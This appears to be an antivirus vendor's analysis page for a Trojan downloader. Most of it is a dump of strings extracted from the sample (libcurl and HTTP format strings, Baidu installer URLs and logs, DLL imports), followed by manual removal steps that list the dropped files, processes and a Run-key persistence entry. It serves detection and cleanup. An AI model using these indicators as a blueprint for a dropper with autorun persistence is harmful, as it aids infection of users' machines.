[^?&/:]://%c

Issue another request to this URL: '%s'

Violate RFC 2616/10.3.2 and switch from POST to GET

Violate RFC 2616/10.3.3 and switch from POST to GET

Disables POST, goes with %s

WSAStartup failed (%d)

insufficient winsock version to support telnet

%s IAC %s

%s IAC %d

%s %s %s

%s %s %d

%s %d %d

Sending data failed (%d)

%s IAC SB

%s (unsupported)

%d (unknown)

USER,%s

7[^= ]%*[ =]%5s

Syntax error in telnet option: %s

Unknown telnet option %s

%c%c%c%c%s%c%c

%c%c%c%c

7[^,],7s

%c%s%c%s

WS2_32.DLL

failed to load WS2_32.DLL (%d)

failed to find WSACreateEvent function (%d)

failed to find WSACloseEvent function (%d)

failed to find WSAEventSelect function (%d)

failed to find WSAEnumNetworkEvents function (%d)

WSACreateEvent failed (%d)

WSAEnumNetworkEvents failed (%d)

WSACloseEvent failed (%d)

FreeLibrary(wsock2) failed (%d)

SMTP

EHLO %s

HELO %s

AUTH %s %s

Got unexpected smtp-server response: %d

Remote access denied: %d

smtp

MAIL FROM:%s

MAIL FROM:%s AUTH=%s

MAIL FROM:%s AUTH=%s SIZE=%s

MAIL FROM:%s SIZE=%s

RCPT TO:%s

RCPT TO:<%s>

MAIL failed: %d

RCPT failed: %d

SMTPS not supported!

Establish HTTP proxy tunnel to %s:%hu

%s:%hu

%s%s%s:%hu

Host: %s

CONNECT %s HTTP/%s

%s%s%s%s

HTTP/1.%d %d

TUNNEL_STATE switched to: %d

Received HTTP code %d from proxy after CONNECT

%sAuthorization: Basic %s

The requested URL returned error: %d

%s auth using %s with user '%s'

%s, d %s M d:d:d GMT

If-Modified-Since: %s

If-Unmodified-Since: %s

Last-Modified: %s

Chunky upload is not supported by HTTP 1.0

Host: %s%s%s

Host: %s%s%s:%hu

PTF://

Range: bytes=%s

Content-Range: bytes %s%lld/%lld

Content-Range: bytes %s/%lld

PTF://%s:%s@%s

%s HTTP/%s

%s%s%s%s%s%s%s%s%s%s%s

%s%s=%s

Internal HTTP POST error!

Content-Type: application/x-www-form-urlencoded

Failed sending HTTP POST request

Failed sending HTTP request

HTTP/

Avoided giant realloc for header (max is %d)!

The requested URL returned error: %s

HTTP error before end of send, stop sending

HTTP/%d.%d =

HTTP =

RTSP/%d.%d =

HTTP 1.0, assume close after body

HTTP/1.0 proxy connection set to keep alive!

HTTP/1.1 proxy connection set close!

HTTP/1.0 connection set to keep alive!

Operation too slow. Less than %ld bytes/sec transferred the last %ld seconds

Unsupported protocol

URL using bad/illegal format or missing URL

A requested feature, protocol or option was not found built-in in this libcurl due to a build-time decision.

FTP: weird server reply

FTP: The server failed to connect to data port

FTP: Accepting server connect has timed out

FTP: The server did not accept the PRET command.

FTP: unknown PASS reply

FTP: unknown PASV reply

FTP: unknown 227 response format

FTP: can't figure out the host in the PASV response

FTP: couldn't set file type

FTP: couldn't retrieve (RETR failed) the specified file

HTTP response code said error

FTP: command PORT failed

FTP: command REST failed

Operation was aborted by an application callback

A libcurl function was given a bad argument

An unknown option was passed in to libcurl

SSL peer certificate or SSH remote key was not OK

Problem with the local SSL certificate

Peer certificate cannot be authenticated with given CA certificates

Problem with the SSL CA cert (path? access rights?)

Unrecognized or bad HTTP Content or Transfer-Encoding

Invalid LDAP URL

Issuer check against peer certificate failed

Login denied

TFTP: File Not Found

TFTP: Access Violation

TFTP: Illegal operation

TFTP: Unknown transfer ID

TFTP: No such user

Caller must register CURLOPT_CONV_ callback options

Error in the SSH layer

Unable to parse FTP file list

Protocol option is unsupported

Protocol is unsupported

Socket is unsupported

Operation not supported

Address family not supported

Protocol family not supported

Winsock version not supported

Unknown error %d (%#x)

d:d:d

d:d

%c%c==

%c%c%c=

%s xxxxxxxxxxxxxxxx

00000001

12345678

%s/%s

username="%s",realm="%s",nonce="%s",cnonce="%s",nc="%s",digest-uri="%s",response=%s

0123456789-

; filename="%s"

%s; boundary=%s

Content-Type: multipart/mixed, boundary=%s

Content-Type: %s

couldn't open file "%s"

--%s--

SYN.ACK

ACK.SYN

XXX

E:\Jenkins\workspace\MiniPackage\build\Release\bdMiniDownloader.pdb

WS2_32.dll

HttpSendRequestW

HttpQueryInfoW

HttpOpenRequestW

InternetCrackUrlW

WININET.dll

SHLWAPI.dll

IPHLPAPI.DLL

PSAPI.DLL

PeekNamedPipe

GetCPInfo

GetProcessHeap

KERNEL32.dll

USER32.dll

RegCloseKey

RegEnumKeyExW

RegOpenKeyExW

RegCreateKeyExW

ADVAPI32.dll

ole32.dll

ShellExecuteExW

SHFileOperationW

SHELL32.dll

GDI32.dll

GdiplusShutdown

gdiplus.dll

WSOCK32.dll

WinHttpCloseHandle

WinHttpGetProxyForUrl

WinHttpOpen

WinHttpGetIEProxyConfigForCurrentUser

WINHTTP.dll

WLDAP32.dll

?456789:;<=

!"#$%&'()* ,-./0123

<4,$?7/'

(3-!0,1'8"5.*2$

zcÁ

.?AVCMD5Checksum@@

"iTXtXML:com.adobe.xmp

" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:40F702BB9E9011E38C119B9D36C7DD62" xmpMM:DocumentID="xmp.did:40F702BC9E9011E38C119B9D36C7DD62"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:40F702B99E9011E38C119B9D36C7DD62" stRef:documentID="xmp.did:40F702BA9E9011E38C119B9D36C7DD62"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>

" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:4B92474C9E9011E39814DABADC782ABD" xmpMM:DocumentID="xmp.did:4B92474D9E9011E39814DABADC782ABD"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:4B92474A9E9011E39814DABADC782ABD" stRef:documentID="xmp.did:4B92474B9E9011E39814DABADC782ABD"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>

" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:2F6B0F666F5311E2B37994BB203073E2" xmpMM:DocumentID="xmp.did:2F6B0F676F5311E2B37994BB203073E2"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:2F6B0F646F5311E2B37994BB203073E2" stRef:documentID="xmp.did:2F6B0F656F5311E2B37994BB203073E2"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>S

fiTXtXML:com.adobe.xmp

" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:11DAFFFF7B6EE21188A8A102A34B470D" xmpMM:DocumentID="xmp.did:FF49499E6F5111E2A669A1961A88CA63" xmpMM:InstanceID="xmp.iid:FF49499D6F5111E2A669A1961A88CA63" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:E90FAD22AE6EE21188A8A102A34B470D" stRef:documentID="xmp.did:11DAFFFF7B6EE21188A8A102A34B470D"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>)

" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:11DAFFFF7B6EE21188A8A102A34B470D" xmpMM:DocumentID="xmp.did:1D7D666F7BFE11E2BD6AA411B2620E95" xmpMM:InstanceID="xmp.iid:1D7D666E7BFE11E2BD6AA411B2620E95" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:FB83E61E3E6FE211AA95A89280EC434B" stRef:documentID="xmp.did:11DAFFFF7B6EE21188A8A102A34B470D"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>

" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:11DAFFFF7B6EE21188A8A102A34B470D" xmpMM:DocumentID="xmp.did:DABEBB0F7BFD11E2AB119E5A44D0BEB7" xmpMM:InstanceID="xmp.iid:DABEBB0E7BFD11E2AB119E5A44D0BEB7" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:E8C996E5897AE21186448A62D3D64C02" stRef:documentID="xmp.did:11DAFFFF7B6EE21188A8A102A34B470D"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>

" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:11DAFFFF7B6EE21188A8A102A34B470D" xmpMM:DocumentID="xmp.did:2720BC0E7BFF11E2BBE3A94C3F17A90B" xmpMM:InstanceID="xmp.iid:2720BC0D7BFF11E2BBE3A94C3F17A90B" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:60EEDFAFD57BE2118007B0063BB2D839" stRef:documentID="xmp.did:11DAFFFF7B6EE21188A8A102A34B470D"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>r

" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:11DAFFFF7B6EE21188A8A102A34B470D" xmpMM:DocumentID="xmp.did:586FB3776F5311E29AF5F39FDCE96E0C" xmpMM:InstanceID="xmp.iid:586FB3766F5311E29AF5F39FDCE96E0C" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:DE459A23AD6EE21188A8A102A34B470D" stRef:documentID="xmp.did:11DAFFFF7B6EE21188A8A102A34B470D"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>'

" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:8BE655707A5E11E2A6F3F91090C2A9F8" xmpMM:DocumentID="xmp.did:8BE655717A5E11E2A6F3F91090C2A9F8"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:8BE6556E7A5E11E2A6F3F91090C2A9F8" stRef:documentID="xmp.did:8BE6556F7A5E11E2A6F3F91090C2A9F8"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>

" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:1BC804D76C6D11E399F1ECB53FDD5265" xmpMM:DocumentID="xmp.did:1BC804D86C6D11E399F1ECB53FDD5265"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:1BC804D56C6D11E399F1ECB53FDD5265" stRef:documentID="xmp.did:1BC804D66C6D11E399F1ECB53FDD5265"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>x,

" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:8BD4B6966C6E11E39AA9E7C5479B4D87" xmpMM:DocumentID="xmp.did:8BD4B6976C6E11E39AA9E7C5479B4D87"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:8BD4B6946C6E11E39AA9E7C5479B4D87" stRef:documentID="xmp.did:8BD4B6956C6E11E39AA9E7C5479B4D87"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>A

" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:EAB2B8459E9311E3A802CF8194EE1EBF" xmpMM:DocumentID="xmp.did:EAB2B8469E9311E3A802CF8194EE1EBF"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:EAB2B8439E9311E3A802CF8194EE1EBF" stRef:documentID="xmp.did:EAB2B8449E9311E3A802CF8194EE1EBF"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>

.ve\@

l.upzY

<requestedExecutionLevel level="requireAdministrator" uiAccess="false"></requestedExecutionLevel>

6'7J78`8}8

< <$<(<,<0<

7 7$7(7,707

8$8(8,808^8|8

=$=*=2=@=\=

; ;$;(;,;0;4;8;<;\<

9 9$9(9:9

3?3`3{3

4O4`4{4

7’9C9H9M9':G:

5!5'535@5

99p9v9

1 202[2`2

=$=(=,=0=4=8=<=@=

>(>/>4>8><>]>

>&?,?0?4?8?

3,52585{5

0094989

; ;$;(;,;0;4;8;

6$6<6@6\6`6

Eiexplore.exe

E-%%

1.0.0.0

HTTP/1.1

hXXp://en.browser.baidu.com/report/install.cgi?

SparkMiniInstall.ini

JhXXp://en.browser.baidu.com/query/package.xml?

Jspark.exe

Software\Microsoft\Windows\CurrentVersion\App Paths\Spark.exe

/ChannelLaunchURL

Advapi32.dll

%s 0%%

%s -%%

/ChannelLaunchURL=

..\spark_install.exe

spark_install.exe

en.browser.baidu.com/license.html

en.browser.baidu.com/policy.html

en.browser.baidu.com

id.browser.baidu.com/license.html

id.browser.baidu.com/policy.html

id.browser.baidu.com

Portugu

br.browser.baidu.com/license.html

br.browser.baidu.com/policy.html

br.browser.baidu.com

th.browser.baidu.com/license.html

th.browser.baidu.com/policy.html

th.browser.baidu.com

%d.d.d-d:d:d

%s, Call DownloadOver, percent=%d, RetCode=%d

%s, DownloadRet = %d, costtime = f

%s, costtime = f

%s, Exception

%s, Start New Channel : %d

%s, limit download speed

%s, Error : Url or Path NULL

%s, Error : Url or Path empty

%s First DestPath = %s

%s URL = %s

%s, Error : work thread start

%s, Error : Path can't write

%s, Error : CreateDirectory fail

%s, Error : Path no legal

%s, Error : Re In

F%s, End

%s, Start

X-X-x-XX-XXXXXX

%s, GetLastError=%d

%s, percent=%d, Speed=%I64d

%s, want to StopThread

%s, StartNewThread : %d

%s, cookie = %d

%s, It should not happen

%s, Stop Thread

%s, Fail download : retry times = %d

%s, Fail more than max retry time!!!

%s, Network error

%s, CTimerStartChannelTask Stop Thread

%s, Stop a Channel : %d

%s, CDownloadPartOverTask StopNewThread

%s, Respone = %d

%s, curl_easy_perform = %d

%s No Valid Dest Path Error

%s No ReuseSameFile : RemoteFileSize no same

%s No ReuseSameFile : configured size big than remote file

%s No ReuseSameFile : channel num error

%s No ReuseSameFile

%s url md5 = %s

%s, First Start StartNewThread : %d

%s, Call DownloadStart

%s, MemMap UniqueID:%s

%s Final DestPath = %s

%s Big File No NTFS disk

%s, DeleteFile GetLastError=%d

%s No Support Range

%s remote size = %I64d

%s, GetRemoteFileSize : Retry = %d

%s, GetNetFileSize Respone = %d

%s, GetNetFileSize curl_easy_perform = %d

%s Proxy: %s

%s IE Proxy: %s

%s, Network Error

C%s, no gnet file

%s gnet info: %s

.gnet

%s, cookie:%d, responsecode:%d

%s, mapFile Write Error

%s, cookie:%d, head:%s

127.0.0.1

https=

http=

KERNEL32.DLL

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

mscoree.dll

WUSER32.DLL

\Baidu\Common\I18N\conf.db

%s(%d)%s

\test4822FBB5_0309_420f_9DA2_FA5B8B854947.txt

%dddddd

XXxXXXXXXXX

\/:*?"<>|

SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}

SYSTEM\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}

\\.\PhysicalDrive%d

\\.\Scsi%d:

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\4.62521202070639\bdMiniDownloaderEG_MENAON-Mini_32_3313.exe

1.0.0.2

bdMiniDownload.exe

Remove it with Ad-Aware

1. Click (here) to download and install Ad-Aware Free Antivirus.
2. Update the definition files.
3. Run a full scan of your computer.

Manual removal*

1. Terminate malicious process(es) (How to End a Process With the Task Manager):
   

   %original file name%.exe:1600
   Setup.exe:1688
   doc.exe:640
   Index.exe:1204

2. Delete the original Trojan file.
   
3. Delete or disinfect the following files created/modified by the Trojan:
   

   %Documents and Settings%\%current user%\Local Settings\Temp\Setup.exe (8801 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\Index.exe (9361 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\autB3.tmp (4161 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\autB2.tmp (5737 bytes)
   %Documents and Settings%\%current user%\Cookies\Current_User@menaon[1].txt (212 bytes)
   %Documents and Settings%\%current user%\Cookies\index.dat (2120 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\4.62521202070639\bdMiniDownloaderEG_MENAON-Mini_32_3313.exe (388 bytes)
   %Documents and Settings%\%current user%\Cookies\Current_User@somdows[1].txt (214 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\bdMiniDownloaderEG_MENAON-Mini_32_3313[1].exe (1969 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\4.62521202070639\3.92826783796772.txt (371 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\5[1].txt (232 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\1.11824613064528\1.90694312099367.txt (232 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\desktop.ini (67 bytes)
   %Documents and Settings%\%current user%\Cookies\Current_User@cpa-install[1].txt (221 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\desktop.ini (67 bytes)
   %Documents and Settings%\%current user%\Application Data\Google\int\one.exe (117004 bytes)
   %Documents and Settings%\%current user%\Application Data\Google\int\doc.exe (117724 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\updater[1].exe (443897 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\google[1].exe (445697 bytes)

4. Delete the following value(s) in the autorun key (How to Work with System Registry):
   

   [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
   "Microsoft" = "%Documents and Settings%\%current user%\Application Data\Google\int\one.exe"

5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
   
6. Reboot the computer.
   

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.